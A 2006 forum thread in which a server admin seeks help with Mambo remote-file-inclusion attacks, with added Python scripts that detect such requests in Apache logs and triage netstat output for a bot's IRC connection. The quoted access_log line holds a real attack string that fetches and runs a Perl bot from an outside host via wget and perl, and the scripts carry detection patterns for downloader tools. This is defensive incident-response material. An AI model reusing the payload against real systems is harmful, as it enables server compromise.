HowtoForge Forums > ISPConfig 2 > General
#1  16th July 2006, 01:15  Grizzly (Member)
php script injections

My server is being attacked by script injections. I have already chmodded wget, but the attacks still continue and seem to be getting more advanced. I need help securing the server.

extract from logfile /var/log/apache2/access_log

82.77.174.39 - - [16/Jul/2006:00:33:30 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.90.88.178/tool.gif?&cmd=cd%20/tmp/;wget%20http://66.90.88.178/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 404 1181 "-" "Mozilla/5.0"

extract from logfile /var/log/apache2/error_log

[Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP
[Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP
--22:20:55-- http://66.90.88.178/mambo.txt
=> `mambo.txt'
Connecting to 66.90.88.178:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,282 (16K) [text/plain]

0K .......... ..... 100% 7.77 KB/s

22:20:58 (7.77 KB/s) - `mambo.txt' saved [16282/16282]

kill: usage: kill [-s sigspec | -n signum | -sigspec] [pid | job]... or kill -l [sigspec]
[Sat Jul 15 22:41:53 2006] [warn] child process 13552 still did not exit, sending a SIGTERM
[Sat Jul 15 22:41:53 2006] [warn] child process 30607 still did not exit, sending a SIGTERM


I need help, advice, anything...

Thank you in advance
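The access_log line quoted in the post above is the classic Mambo mosConfig_absolute_path remote file inclusion: the _REQUEST[...] and GLOBALS= parameters overwrite variables through register_globals, mosConfig_absolute_path points an include() at a PHP file on the attacker's host (the trailing ? makes whatever Mambo appends to the path a query string on that host instead of a local path), and cmd= carries the shell chain that downloads and runs mambo.txt. The 404 on that request says nothing about whether the payload ran; the wget transcript in error_log is the evidence of execution. The following Python is an added example, not code from the thread: it pulls the request target out of combined-format log lines, decodes the query without splitting on ";" (so a command chain survives as one value), and flags the three signatures. The first sample line is the one from the post; the other two, using RFC 5737 documentation addresses, are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample: line 1 is the request quoted in the post above; lines 2
# and 3 (RFC 5737 documentation addresses) are made up, one percent-encoded
# attack and one ordinary Mambo page view.
SAMPLE_LOG = [
    '82.77.174.39 - - [16/Jul/2006:00:33:30 +0200] "GET /index.php?_REQUEST[option]=com_content'
    '&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.90.88.178/tool.gif?&cmd=cd%20/tmp/;'
    'wget%20http://66.90.88.178/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 404 1181 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [16/Jul/2006:01:02:11 +0200] "GET /index.php?mosConfig_absolute_path='
    'http%3A%2F%2F198.51.100.9%2Fx.txt%3F HTTP/1.1" 200 812 "-" "libwww-perl/5.805"',
    '198.51.100.20 - - [16/Jul/2006:01:05:42 +0200] "GET /index.php?option=com_content&task=view'
    '&id=12&Itemid=1 HTTP/1.1" 200 5321 "-" "Mozilla/5.0"',
]

# Apache combined log format up to the status code; the rest is not needed.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) ')
# PHP superglobals being set from the query string (register_globals poisoning).
SUPERGLOBAL = re.compile(r'^(?:GLOBALS|_(?:REQUEST|GET|POST|COOKIE|SERVER|FILES|ENV))(?:\[|$)')
# A parameter value that is itself a URL on another host: include() will fetch it.
REMOTE_URL = re.compile(r'^\s*(?:https?|ftp)://', re.I)
# Shell command separators plus a download/interpreter binary in the same value.
SHELL_CHAIN = re.compile(r'[;|`]|&&|\$\(')
DOWNLOADER = re.compile(r'\b(?:wget|curl|lynx|fetch|perl|python|php)\b', re.I)


def split_query(target):
    """Decoded (name, value) pairs from the request target.

    Split on '&' only: a chain such as cd /tmp/;wget ... must stay in one
    value, so ';' is deliberately not treated as a pair separator."""
    _, _, query = target.partition('?')
    pairs = []
    for part in query.split('&'):
        if part:
            name, _, value = part.partition('=')
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def classify(target):
    """Map each attack category to the parameter names that triggered it."""
    hits = {}
    for name, value in split_query(target):
        if SUPERGLOBAL.match(name):
            hits.setdefault('register_globals', []).append(name)
        if REMOTE_URL.match(value):
            hits.setdefault('rfi', []).append(name)
        if SHELL_CHAIN.search(value) and DOWNLOADER.search(value):
            hits.setdefault('command_injection', []).append(name)
    return hits


def scan(lines):
    """Return one record per combined-format log line that trips a category."""
    flagged = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(m['target'])
        if hits:
            flagged.append({'ip': m['ip'], 'time': m['ts'],
                            'status': int(m['status']), 'hits': hits})
    return flagged


if __name__ == '__main__':
    for rec in scan(SAMPLE_LOG):
        # The status code is not evidence either way; correlate with error_log.
        print(rec['ip'], rec['time'], rec['status'], rec['hits'])
```

Feeding the real file works as scan(open('/var/log/apache2/access_log')); every hit is a candidate for matching against the wget transcripts in error_log by timestamp, which is how to tell which of these requests actually executed.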
#2  16th July 2006, 09:11  sjau (Local Meanie, Switzerland)

You could deny the IP of the attacker in a .htaccess.
#3  16th July 2006, 09:48  TheRudy (Senior Member)

Remove the script ASAP. Contact the author of the script and tell them about this if you haven't written it yourself. You might also check for updates. Denying the IP won't solve it, because he can use a different server and, voila, you get hacked again.

I would lock down the server until it's checked out. Run chkrootkit and rkhunter (not sure if they detect this script, but it can't hurt running them). An antivirus scan can't hurt either.

Btw, Mambo is a VERY buggy application. I would suggest you switch to Joomla if you want the same interface and stuff. I think you can even upgrade from Mambo to Joomla.
#4  16th July 2006, 09:53  edge (Moderator, The Netherlands)

http://66.90.88.178/mambo.txt is already giving me a virus warning!

I like the "main" site :-)
#5  16th July 2006, 10:13  TheRudy (Senior Member)

Quote:
Originally Posted by edge
http://66.90.88.178/mambo.txt is already giving me a virus warning!

I like the "main" site :-)

You also checked that, eh?
#6  16th July 2006, 10:46  Grizzly (Member)
Can't find the scripts on my site

I can't seem to find the script on my server. I've installed rkhunter, updated it and scanned the system; it found nothing.

66.90.88.178 is not my site; it's just that my server is being told to get these scripts from various sites, including the one mentioned, and then running them. When I check my running processes I find a lot of https instances, which don't make any sense to me. I've tried looking for help on installing mod_security on my SUSE 10 server, but had no luck. I'm not too sure if it's safe to install when running ISPConfig with SUSE 10 using the Perfect Setup from HowtoForge.

I have also updated to the latest patches from SUSE. These scripts are also being run on domains that I have since made dormant, with nothing in the actual /var/www/web#/web folder; when I check my logs, even they are being used to download these scripts, which is strange, since before ISPConfig was installed I chmod 700'd wget.
#7  16th July 2006, 11:08  TheRudy (Senior Member)

The script looks like a war bot, or whatever they are called. They are using a known exploit of the script (you're running the Mambo script, right?): they google for it and then try to inject this script.

Check the running processes (ps) and network connections (netstat) to see if you are connected to IRC:
host: 66.90.88.178
port: 7474

If you are, kill it! And block that port and IP with the firewall.

Once you fix this, go to that IRC channel and say to them: I just PWNED YOU!
#8  16th July 2006, 11:20  Grizzly (Member)
Output of netstat

Active UNIX domain sockets (w/o servers)
Proto RefCnt Flags Type State I-Node Path
unix 14 [ ] DGRAM 9984 /dev/log
unix 2 [ ] DGRAM 9986 /var/lib/named/dev/log
unix 2 [ ] DGRAM 4385 @/org/kernel/udev/udevd
unix 2 [ ] DGRAM 12216 @/var/run/hal/hotplug_s ocket2
unix 2 [ ] DGRAM 28905
unix 2 [ ] DGRAM 17548
unix 2 [ ] DGRAM 16934
unix 3 [ ] STREAM CONNECTED 16687
unix 3 [ ] STREAM CONNECTED 16686
unix 3 [ ] STREAM CONNECTED 16683
unix 3 [ ] STREAM CONNECTED 16682
unix 3 [ ] STREAM CONNECTED 16679
unix 3 [ ] STREAM CONNECTED 16678
unix 3 [ ] STREAM CONNECTED 16675
unix 3 [ ] STREAM CONNECTED 16674
unix 3 [ ] STREAM CONNECTED 16671
unix 3 [ ] STREAM CONNECTED 16670
unix 3 [ ] STREAM CONNECTED 16667
unix 3 [ ] STREAM CONNECTED 16666
unix 3 [ ] STREAM CONNECTED 16663
unix 3 [ ] STREAM CONNECTED 16662
unix 3 [ ] STREAM CONNECTED 16659
unix 3 [ ] STREAM CONNECTED 16658
unix 3 [ ] STREAM CONNECTED 16655
unix 3 [ ] STREAM CONNECTED 16654
unix 3 [ ] STREAM CONNECTED 16651
unix 3 [ ] STREAM CONNECTED 16650
unix 3 [ ] STREAM CONNECTED 16647
unix 3 [ ] STREAM CONNECTED 16646
unix 3 [ ] STREAM CONNECTED 16643
unix 3 [ ] STREAM CONNECTED 16642
unix 3 [ ] STREAM CONNECTED 16639
unix 3 [ ] STREAM CONNECTED 16638
unix 3 [ ] STREAM CONNECTED 16635
unix 3 [ ] STREAM CONNECTED 16634
unix 3 [ ] STREAM CONNECTED 16631
unix 3 [ ] STREAM CONNECTED 16630
unix 3 [ ] STREAM CONNECTED 16627
unix 3 [ ] STREAM CONNECTED 16626
unix 3 [ ] STREAM CONNECTED 16623
unix 3 [ ] STREAM CONNECTED 16622
unix 3 [ ] STREAM CONNECTED 16619
unix 3 [ ] STREAM CONNECTED 16618
unix 3 [ ] STREAM CONNECTED 16615
unix 3 [ ] STREAM CONNECTED 16614
unix 3 [ ] STREAM CONNECTED 16611
unix 3 [ ] STREAM CONNECTED 16610
unix 3 [ ] STREAM CONNECTED 16607
unix 3 [ ] STREAM CONNECTED 16606
unix 3 [ ] STREAM CONNECTED 16603
unix 3 [ ] STREAM CONNECTED 16602
unix 3 [ ] STREAM CONNECTED 16599
unix 3 [ ] STREAM CONNECTED 16598
unix 3 [ ] STREAM CONNECTED 16595
unix 3 [ ] STREAM CONNECTED 16594
unix 3 [ ] STREAM CONNECTED 16591
unix 3 [ ] STREAM CONNECTED 16590
unix 3 [ ] STREAM CONNECTED 16588
unix 3 [ ] STREAM CONNECTED 16587
unix 3 [ ] STREAM CONNECTED 16584
unix 3 [ ] STREAM CONNECTED 16583
unix 3 [ ] STREAM CONNECTED 16581
unix 3 [ ] STREAM CONNECTED 16580
unix 2 [ ] DGRAM 16565
unix 2 [ ] DGRAM 13315
unix 3 [ ] STREAM CONNECTED 13230 /var/run/dbus/system_bu s_socket
unix 3 [ ] STREAM CONNECTED 13229
unix 3 [ ] STREAM CONNECTED 13019 @/tmp/hald-local/dbus-q emgvsK3Jl
unix 3 [ ] STREAM CONNECTED 13018
unix 3 [ ] STREAM CONNECTED 12908 /var/run/dbus/system_bu s_socket
unix 3 [ ] STREAM CONNECTED 12907
unix 3 [ ] STREAM CONNECTED 12906 /var/run/acpid.socket
unix 3 [ ] STREAM CONNECTED 12905
unix 2 [ ] DGRAM 12902
unix 3 [ ] STREAM CONNECTED 12505 /var/run/acpid.socket
unix 3 [ ] STREAM CONNECTED 12504
unix 3 [ ] STREAM CONNECTED 12570 @/tmp/hald-local/dbus-q emgvsK3Jl
unix 3 [ ] STREAM CONNECTED 12503
unix 2 [ ] DGRAM 12142
unix 2 [ ] DGRAM 10931
unix 2 [ ] DGRAM 10743
unix 2 [ ] DGRAM 10537
unix 2 [ ] DGRAM 10363
unix 2 [ ] DGRAM 9994
unix 2 [ ] STREAM CONNECTED 9811
unix 3 [ ] STREAM CONNECTED 4968
unix 3 [ ] STREAM CONNECTED 4967
#9  16th July 2006, 11:25  TheRudy (Senior Member)

Do a netstat -tap, sorry.
#10  16th July 2006, 13:31  Grizzly (Member)
netstat -tap reveals the following

Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 *:mysql *:* LISTEN 3045/mysqld
tcp 0 0 localhost:compaq-evm *:* LISTEN 4683/fam
tcp 0 0 *:sunrpc *:* LISTEN 4306/portmap
tcp 0 0 *:hosts2-ns *:* LISTEN 4093/ispconfig_http
tcp 0 0 *:ftp *:* LISTEN 5350/proftpd: (acce
tcp 0 0 192.168.0.200:domain *:* LISTEN 5276/named
tcp 0 0 server.mydomain:domain *:* LISTEN 5276/named
tcp 0 0 localhost:domain *:* LISTEN 5276/named
tcp 0 0 localhost:953 *:* LISTEN 5276/named
tcp 0 0 *:smtp *:* LISTEN 5138/master
tcp 0 0 *:pop3 *:* LISTEN 4531/couriertcpd
tcp 0 0 *:imap *:* LISTEN 4501/couriertcpd
tcp 0 0 *:www-http *:* LISTEN 5005/httpd2-prefork
tcp 0 0 *:ssh *:* LISTEN 4905/sshd
tcp 0 0 localhost:953 *:* LISTEN 5276/named
tcp 0 0 *:smtp *:* LISTEN 5138/master
tcp 0 0 *:https *:* LISTEN 5005/httpd2-prefork
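The check asked for in post #7 is a plain read of the netstat table: any ESTABLISHED connection to 66.90.88.178 (the thread names port 7474) is the bot talking to its IRC server, and the PID/Program name column gives the process to kill. The output in post #10 contains only LISTEN rows, so nothing was connected at that moment; it also shows resolved service names (*:mysql, *:www-http), whereas netstat -tapn prints numeric addresses and ports, which is the form to use when matching against an IP. The following Python is an added example, not code from the thread. It parses netstat -tapn output, uses the LISTEN rows to tell inbound connections from outbound ones, flags peers on a blocklist and outbound connections owned by an interpreter such as perl (which is what a PHP-spawned bot normally looks like in that column), and prints the kill and iptables commands for review rather than running them. The sample table, its PIDs, the perl process and the 7474 connection are constructed; the listening services mirror the post.

```python
import re

# Constructed `netstat -tapn` output. Listeners follow the post; the
# ESTABLISHED rows, PIDs and the perl process are invented for the example.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      3045/mysqld
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      5350/proftpd: (accepting connections)
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      5138/master
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      5005/httpd2-prefork
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      4905/sshd
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      5005/httpd2-prefork
tcp        0      0 192.168.0.200:80        203.0.113.7:51234       ESTABLISHED 13552/httpd2-prefork
tcp        0      0 192.168.0.200:43210     66.90.88.178:7474       ESTABLISHED 17312/perl
tcp        0      0 192.168.0.200:22        192.168.0.10:50001      ESTABLISHED 6021/sshd: admin [priv]
tcp        0      0 192.168.0.200:42001     192.0.2.50:80           ESTABLISHED -
"""

# One TCP row: proto, queues, local, foreign, state, then "PID/Program name"
# (which may contain spaces, e.g. "sshd: admin [priv]") or "-" when not visible.
LINE_RE = re.compile(
    r'^(?P<proto>tcp6?)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<foreign>\S+)\s+'
    r'(?P<state>[A-Z_]+)\s+(?P<owner>\S.*)$')

# A web server has no business holding outbound sockets from these.
INTERPRETERS = {'perl', 'python', 'php', 'sh', 'bash', 'ruby'}


def split_addr(addr):
    """'192.168.0.200:43210' -> ('192.168.0.200', 43210); '0.0.0.0:*' -> ('0.0.0.0', None)."""
    host, _, port = addr.rpartition(':')
    return host, (int(port) if port.isdigit() else None)


def parse_netstat(text):
    """Turn netstat -tapn text into a list of connection dicts."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        lhost, lport = split_addr(m['local'])
        fhost, fport = split_addr(m['foreign'])
        owner = m['owner'].strip()
        pid, prog = None, None
        if owner != '-':                       # '-' means netstat was not run as root
            pid_s, _, prog = owner.partition('/')
            pid = int(pid_s)
            prog = prog.split()[0].rstrip(':')  # 'proftpd: (accepting ...' -> 'proftpd'
        conns.append({'lhost': lhost, 'lport': lport, 'fhost': fhost, 'fport': fport,
                      'state': m['state'], 'pid': pid, 'prog': prog})
    return conns


def triage(conns, c2_hosts):
    """Flag established connections worth killing; c2_hosts is the blocklist."""
    listening = {c['lport'] for c in conns if c['state'] == 'LISTEN'}
    findings = []
    for c in conns:
        if c['state'] != 'ESTABLISHED':
            continue
        # If our local port is one we listen on, a client came to us (inbound);
        # otherwise this process opened the connection itself (outbound).
        outbound = c['lport'] not in listening
        reasons = []
        if c['fhost'] in c2_hosts:
            reasons.append('peer %s is a known C2 host' % c['fhost'])
        if outbound and c['prog'] in INTERPRETERS:
            reasons.append('outbound connection owned by interpreter %s' % c['prog'])
        if outbound and c['pid'] is None:
            reasons.append('outbound connection with hidden owner (rerun netstat as root)')
        if reasons:
            findings.append({'pid': c['pid'], 'prog': c['prog'],
                             'peer': '%s:%s' % (c['fhost'], c['fport']), 'reasons': reasons})
    return findings


def remediation(findings, c2_hosts):
    """Commands an admin would review and run: kill the owners, drop the C2 host both ways."""
    cmds = ['kill -9 %d' % f['pid'] for f in findings if f['pid'] is not None]
    for host in sorted(c2_hosts):
        cmds.append('iptables -I OUTPUT -d %s -j DROP' % host)
        cmds.append('iptables -I INPUT -s %s -j DROP' % host)
    return cmds


if __name__ == '__main__':
    c2 = {'66.90.88.178'}
    found = triage(parse_netstat(SAMPLE_NETSTAT), c2)
    for f in found:
        print(f['pid'], f['prog'], f['peer'], '; '.join(f['reasons']))
    print('\n'.join(remediation(found, c2)))
```

Run it against the live box with parse_netstat(subprocess.check_output(['netstat', '-tapn'], text=True)) as root; without root the owner column reads "-", which the triage reports instead of silently passing. Killing the perl process only removes the bot; the include in index.php is still reachable, so the firewall rule buys time to fix or remove Mambo, it does not replace doing so.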
All times are GMT +2.